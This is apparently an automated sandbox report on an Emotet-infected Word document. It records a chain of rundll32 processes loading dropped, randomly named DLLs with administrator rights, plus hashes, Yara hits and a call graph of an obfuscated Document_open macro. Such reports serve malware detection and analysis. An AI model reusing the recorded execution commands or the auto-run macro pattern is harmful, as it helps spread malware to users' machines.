                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 2916 Parent PID: 2468

                                            General

                                            Start time:08:44:51
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2113145679.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 3056 Parent PID: 2916

                                            General

                                            Start time:08:44:52
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2114433259.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 2836 Parent PID: 3056

                                            General

                                            Start time:08:44:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 2276 Parent PID: 2836

                                            General

                                            Start time:08:44:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2116824052.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 2968 Parent PID: 2276

                                            General

                                            Start time:08:44:54
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2120152287.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 3020 Parent PID: 2968

                                            General

                                            Start time:08:44:55
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 2248 Parent PID: 3020

                                            General

                                            Start time:08:44:56
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2352632908.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

                                            Chronological Activities

                                            Disassembly

                                            Code Analysis

                                            VBA Code

                                            Call Graph

                                            Graph

                                            Module: A5gd21klfqu9c6rs

                                            Declaration
                                            LineContent
                                            1

                                            Attribute VB_Name = "A5gd21klfqu9c6rs"

                                            2

                                            Attribute VB_Base = "1Normal.ThisDocument"

                                            3

                                            Attribute VB_GlobalNameSpace = False

                                            4

                                            Attribute VB_Creatable = False

                                            5

                                            Attribute VB_PredeclaredId = True

                                            6

                                            Attribute VB_Exposed = True

                                            7

                                            Attribute VB_TemplateDerived = True

                                            8

                                            Attribute VB_Customizable = True

                                            Executed Functions
                                            Subroutine Document_open, APIs: 120, Strings: 0, Number of lines: 3, Relevance: 181.503
                                            APIsMeta Information

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Zw1k7hcmdl66

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Item

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Hyii7r76oq89

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: diCXTi

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: NZiApKAp

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vrYYHIDxI

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: gzTFLxb

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: PjNhJNA

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: oAaNlB

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: sySRJ

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UwyYSBsBN

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tpOgXmm

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: MHYlQAD

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: GznGGHyG

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: bbsIZ

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Name

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Application

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: swNGWdd

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: rJEkbLH

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vEBqHrDnD

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tWcKo

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: LzxxRHG

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: EKezHIC

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: DpYbmDA

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hDJDJ

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: dXiwA

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hFSyAfFrF

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hXxQDACJA

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: xkQqDXCcD

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Len

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lBenBDA

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UavHTIBHo

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: IcAHwPH

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: BNmrm

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FLtYjKHC

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: qAUhkIMz

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Create

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: V2enhc4htwl7z6bh

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Thriap3q9rgf3yy9y

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: zZuzBZGD

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: OIbfvEEFF

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: eLmLDU

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FYVZFEH

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hoyzuBGCP

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                            Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lADFBaJ

                                            LineInstructionMeta Information
                                            9

                                            Private Sub Document_open()

                                            10

                                            G8xesq0b8jlsfrsp

                                            executed
                                            11

                                            End Sub

                                            Module: Owppnp8hah4xo788

                                            Declaration
                                            LineContent
                                            1

                                            Attribute VB_Name = "Owppnp8hah4xo788"

                                            Executed Functions
                                            Function G8xesq0b8jlsfrsp, APIs: 624, Strings: 66, Number of lines: 195, Relevance: 1394.195
                                            APIsMeta Information

                                            Zw1k7hcmdl66

                                            Item

                                            Hyii7r76oq89

                                            diCXTi

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            NZiApKAp

                                            Close

                                            vrYYHIDxI

                                            gzTFLxb

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            PjNhJNA

                                            Close

                                            oAaNlB

                                            sySRJ

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            UwyYSBsBN

                                            Close

                                            tpOgXmm

                                            MHYlQAD

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

